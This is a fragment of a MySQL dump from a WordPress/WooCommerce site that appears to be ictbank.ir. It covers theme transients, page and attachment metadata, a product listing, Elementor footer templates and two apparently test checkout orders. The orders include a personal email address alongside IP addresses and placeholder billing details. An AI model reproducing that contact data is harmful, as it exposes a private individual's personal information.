192z\";s:3:\"key\";s:14:\"fas-caret-down\";}s:7:\"version\";s:6:\"5.15.3\";}}}}','auto'),
(511512,'_site_transient_timeout_theme_roots','1778965331','off'),
(511513,'_site_transient_theme_roots','a:3:{s:15:\"hello-elementor\";s:7:\"/themes\";s:16:\"twentytwentyfive\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";}','off'),
(511522,'_site_transient_timeout_wp_theme_files_patterns-91ebf24808827fbf4aae502cf2f14357','1779013274','off'),
(511523,'_site_transient_wp_theme_files_patterns-91ebf24808827fbf4aae502cf2f14357','a:2:{s:7:\"version\";s:5:\"3.3.0\";s:8:\"patterns\";a:0:{}}','off');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_postmeta`
--
DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_postmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `post_id` (`post_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=4842 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_postmeta`
--
LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES
(30,27,'_edit_lock','1692809654:2'),
(49,27,'_wp_page_template','templates/template-full-width.php'),
(57,51,'_edit_lock','1713108847:2'),
(58,51,'_wp_page_template','default'),
(67,56,'_edit_lock','1670069958:2'),
(70,56,'_wp_page_template','default'),
(77,60,'_edit_lock','1580647370:2'),
(80,60,'_wp_page_template','templates/template-full-width.php'),
(84,64,'_edit_lock','1580667277:2'),
(86,64,'_wp_page_template','templates/template-full-width.php'),
(87,66,'_edit_lock','1580678176:2'),
(89,68,'_edit_lock','1580680214:2'),
(91,68,'_wp_page_template','templates/template-full-width.php'),
(94,71,'_wp_attached_file','2020/02/ictbank.png'),
(95,71,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:19:\"2020/02/ictbank.png\";s:5:\"sizes\";a:4:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"ictbank-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"ictbank-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"ictbank-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"ictbank-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(96,71,'_wp_attachment_image_alt','ictbank.ir blog'),
(97,72,'_wp_attached_file','2020/02/cropped-ictbank.png'),
(98,72,'_wp_attachment_context','site-icon'),
(99,72,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:27:\"2020/02/cropped-ictbank.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"cropped-ictbank-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"cropped-ictbank-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:27:\"cropped-ictbank-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:27:\"cropped-ictbank-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:27:\"cropped-ictbank-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:25:\"cropped-ictbank-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(100,73,'_wp_attached_file','2020/02/cropped-ictbank-1.png'),
(101,73,'_wp_attachment_context','custom-logo'),
(102,73,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:384;s:4:\"file\";s:29:\"2020/02/cropped-ictbank-1.png\";s:5:\"sizes\";a:4:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-ictbank-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"cropped-ictbank-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"cropped-ictbank-1-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"cropped-ictbank-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(107,76,'_wp_attached_file','2020/02/ictbank.ir_.png'),
(108,76,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:250;s:4:\"file\";s:23:\"2020/02/ictbank.ir_.png\";s:5:\"sizes\";a:6:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"ictbank.ir_-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"ictbank.ir_-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"ictbank.ir_-600x150.png\";s:5:\"width\";i:600;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"ictbank.ir_-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"ictbank.ir_-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"ictbank.ir_-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(109,76,'_wp_attachment_image_alt','ictbank.ir'),
(110,77,'_wp_attached_file','2020/02/cropped-ictbank.ir_.png'),
(111,77,'_wp_attachment_context','custom-logo'),
(112,77,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:250;s:4:\"file\";s:31:\"2020/02/cropped-ictbank.ir_.png\";s:5:\"sizes\";a:6:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"cropped-ictbank.ir_-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank.ir_-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank.ir_-600x150.png\";s:5:\"width\";i:600;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"cropped-ictbank.ir_-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank.ir_-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"cropped-ictbank.ir_-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(120,66,'_wp_page_template','templates/template-full-width.php'),
(124,87,'_wp_attached_file','2020/02/ictbank2.png'),
(125,87,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:434;s:4:\"file\";s:20:\"2020/02/ictbank2.png\";s:5:\"sizes\";a:6:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"ictbank2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"ictbank2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"ictbank2-600x260.png\";s:5:\"width\";i:600;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"ictbank2-300x130.png\";s:5:\"width\";i:300;s:6:\"height\";i:130;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"ictbank2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"ictbank2-768x333.png\";s:5:\"width\";i:768;s:6:\"height\";i:333;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(126,87,'_wp_attachment_image_alt','ictbank.ir'),
(127,88,'_wp_attached_file','2020/02/cropped-ictbank2.png'),
(128,88,'_wp_attachment_context','custom-logo'),
(129,88,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:434;s:4:\"file\";s:28:\"2020/02/cropped-ictbank2.png\";s:5:\"sizes\";a:6:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-ictbank2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-ictbank2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"cropped-ictbank2-600x260.png\";s:5:\"width\";i:600;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-ictbank2-300x130.png\";s:5:\"width\";i:300;s:6:\"height\";i:130;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-ictbank2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"cropped-ictbank2-768x333.png\";s:5:\"width\";i:768;s:6:\"height\";i:333;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(141,93,'_wp_attached_file','2020/02/ictbank-1.png'),
(142,93,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1042;s:6:\"height\";i:430;s:4:\"file\";s:21:\"2020/02/ictbank-1.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"ictbank-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"ictbank-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"ictbank-1-600x248.png\";s:5:\"width\";i:600;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"ictbank-1-300x124.png\";s:5:\"width\";i:300;s:6:\"height\";i:124;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"ictbank-1-1024x423.png\";s:5:\"width\";i:1024;s:6:\"height\";i:423;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ictbank-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"ictbank-1-768x317.png\";s:5:\"width\";i:768;s:6:\"height\";i:317;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"ictbank-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"ictbank-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(143,93,'_wp_attachment_image_alt','ictbank.ir'),
(150,97,'_edit_lock','1580970157:2'),
(152,97,'_wp_page_template','templates/template-full-width.php'),
(157,104,'_edit_lock','1669204000:2'),
(159,104,'_wp_page_template','default'),
(162,110,'_edit_lock','1582657841:2'),
(164,110,'_wp_page_template','templates/template-full-width.php'),
(168,116,'_wp_attached_file','2020/02/E00_Intro.mp3'),
(169,116,'_wp_attachment_metadata','a:17:{s:10:\"dataformat\";s:3:\"mp3\";s:8:\"channels\";i:2;s:11:\"sample_rate\";i:48000;s:7:\"bitrate\";i:192000;s:11:\"channelmode\";s:12:\"joint stereo\";s:12:\"bitrate_mode\";s:3:\"cbr\";s:8:\"lossless\";b:0;s:15:\"encoder_options\";s:6:\"CBR192\";s:17:\"compression_ratio\";d:0.125;s:10:\"fileformat\";s:3:\"mp3\";s:8:\"filesize\";i:3030194;s:9:\"mime_type\";s:10:\"audio/mpeg\";s:6:\"length\";i:126;s:16:\"length_formatted\";s:4:\"2:06\";s:4:\"year\";s:4:\"2020\";s:4:\"date\";s:4:\"2602\";s:4:\"time\";s:4:\"2342\";}'),
(197,150,'_edit_lock','1585086558:2'),
(200,150,'_wp_page_template','templates/template-full-width.php'),
(472,150,'_wp_old_slug','one-way-to-prevent-ddos-attacks-in-wordpress__trashed'),
(517,305,'_edit_lock','1683048287:2'),
(519,305,'_wp_page_template','default'),
(530,97,'_oembed_693128234bac2b8c889f5793103f1b9c','{{unknown}}'),
(531,97,'_oembed_5d74882d497aee0b6a06f23a61458d14','{{unknown}}'),
(532,97,'_oembed_1ce1be5b64f8f791c545afcaaf0cbe68','{{unknown}}'),
(533,97,'_oembed_9f557395c3cd995836c08dbb4e48a2de','{{unknown}}'),
(534,97,'_oembed_b3559fe4b3362cd7bb8bc1c976260f52','{{unknown}}'),
(535,97,'_oembed_5e4485a02549e20bc87d515ebd777623','{{unknown}}'),
(536,312,'_edit_lock','1683037097:2'),
(538,312,'_edit_last','2'),
(540,312,'_yoast_wpseo_primary_category','50'),
(542,104,'_edit_last','2'),
(544,104,'_yoast_wpseo_content_score','90'),
(545,318,'_wp_attached_file','woocommerce-placeholder.png'),
(546,318,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"woocommerce-placeholder.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(547,323,'_edit_lock','1645257696:2'),
(548,323,'_edit_last','2'),
(549,324,'_wp_attached_file','2020/12/Oracle_Core__Essential_Internals_for_DBAs_and_Developers.pdf'),
(550,323,'total_sales','0'),
(551,323,'_tax_status','taxable'),
(552,323,'_tax_class',''),
(553,323,'_manage_stock','no'),
(554,323,'_backorders','no'),
(555,323,'_sold_individually','no'),
(556,323,'_virtual','no'),
(557,323,'_downloadable','no'),
(558,323,'_download_limit','-1'),
(559,323,'_download_expiry','-1'),
(560,323,'_stock',NULL),
(561,323,'_stock_status','instock'),
(562,323,'_wc_average_rating','0'),
(563,323,'_wc_review_count','0'),
(564,323,'_product_version','4.8.0'),
(565,323,'_yoast_wpseo_content_score','60'),
(566,323,'_regular_price','1000'),
(567,323,'_price','1000'),
(568,325,'_order_key','wc_order_nqe3g137fsadu'),
(569,325,'_customer_user','2'),
(570,325,'_payment_method','bankmellat'),
(571,325,'_payment_method_title','بانک ملت'),
(572,325,'_customer_ip_address','192.168.96.130'),
(573,325,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),
(574,325,'_created_via','checkout'),
(575,325,'_cart_hash','df48b0eebab257a31f505ac1adc25034'),
(576,325,'_billing_first_name','سس'),
(577,325,'_billing_last_name','سسس'),
(578,325,'_billing_company','شسیشسی'),
(579,325,'_billing_address_1','شسیشسیشسی'),
(580,325,'_billing_city','تهران'),
(581,325,'_billing_state','THR'),
(582,325,'_billing_postcode','123'),
(583,325,'_billing_country','IR'),
(584,325,'_billing_email','masoud.nikoofar@gmail.com'),
(585,325,'_billing_phone','123123'),
(586,325,'_order_currency','IRR'),
(587,325,'_cart_discount','0'),
(588,325,'_cart_discount_tax','0'),
(589,325,'_order_shipping','0.00'),
(590,325,'_order_shipping_tax','0'),
(591,325,'_order_tax','0'),
(592,325,'_order_total','2000.00'),
(593,325,'_order_version','4.8.0'),
(594,325,'_prices_include_tax','no'),
(595,325,'_billing_address_index','سس سسس شسیشسی شسیشسیشسی تهران THR 123 IR masoud.nikoofar@gmail.com 123123'),
(596,325,'_shipping_address_index',' '),
(597,325,'is_vat_exempt','no'),
(598,326,'_order_key','wc_order_WAHrBuxZQbmu2'),
(599,326,'_customer_user','2'),
(600,326,'_payment_method','bankmellat'),
(601,326,'_payment_method_title','بانک ملت'),
(602,326,'_customer_ip_address','192.168.96.180'),
(603,326,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),
(604,326,'_created_via','checkout'),
(605,326,'_cart_hash','d489d3200b3671fabf39959f679247ef'),
(606,326,'_billing_first_name','سس'),
(607,326,'_billing_last_name','سسس'),
(608,326,'_billing_company','شسیشسی'),
(609,326,'_billing_address_1','شسیشسیشسی'),
(610,326,'_billing_city','تهران'),
(611,326,'_billing_state','THR'),
(612,326,'_billing_postcode','123'),
(613,326,'_billing_country','IR'),
(614,326,'_billing_email','masoud.nikoofar@gmail.com'),
(615,326,'_billing_phone','123123'),
(616,326,'_order_currency','IRR'),
(617,326,'_cart_discount','0'),
(618,326,'_cart_discount_tax','0'),
(619,326,'_order_shipping','0.00'),
(620,326,'_order_shipping_tax','0'),
(621,326,'_order_tax','0'),
(622,326,'_order_total','3000.00'),
(623,326,'_order_version','4.8.0'),
(624,326,'_prices_include_tax','no'),
(625,326,'_billing_address_index','سس سسس شسیشسی شسیشسیشسی تهران THR 123 IR masoud.nikoofar@gmail.com 123123'),
(626,326,'_shipping_address_index',' '),
(627,326,'is_vat_exempt','no'),
(629,329,'_edit_lock','1683037100:2'),
(630,329,'_edit_last','2'),
(633,329,'_wp_page_template','default'),
(646,345,'_elementor_edit_mode','builder'),
(647,345,'_elementor_template_type','kit'),
(648,345,'_elementor_version','3.28.3'),
(707,358,'_elementor_edit_mode','builder'),
(708,358,'_elementor_template_type','footer'),
(709,358,'_elementor_version','3.2.3'),
(710,358,'_edit_lock','1621543771:2'),
(711,359,'_elementor_edit_mode','builder'),
(712,359,'_elementor_template_type','footer'),
(713,359,'_elementor_version','3.2.3'),
(714,358,'_wp_page_template','default'),
(715,358,'_elementor_data','[{\"id\":\"b6afb7b\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#000000\"},\"elements\":[{\"id\":\"b4f6b82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e25389c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">designed & maintained by\\u00a0 <a href=\\\"http:\\/\\/www.ictbank.ir\\\">ICTBANK<\\/a><\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(716,360,'_elementor_edit_mode','builder'),
(717,360,'_elementor_template_type','footer'),
(718,360,'_elementor_version','3.2.3'),
(719,360,'_wp_page_template','default'),
(720,360,'_elementor_data','[{\"id\":\"b6afb7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b4f6b82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e25389c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>designed & maintained by\\u00a0 <a href=\\\"http:\\/\\/www.ictbank.ir\\\">ICTBANK<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(722,361,'_elementor_edit_mode','builder'),
(723,361,'_elementor_template_type','footer'),
(724,361,'_elementor_version','3.2.3'),
(725,361,'_wp_page_template','default'),
(726,361,'_elementor_data','[{\"id\":\"b6afb7b\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#000000\"},\"elements\":[{\"id\":\"b4f6b82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e25389c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">designed & maintained by\\u00a0 <a href=\\\"http:\\/\\/www.ictbank.ir\\\">ICTBANK<\\/a><\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
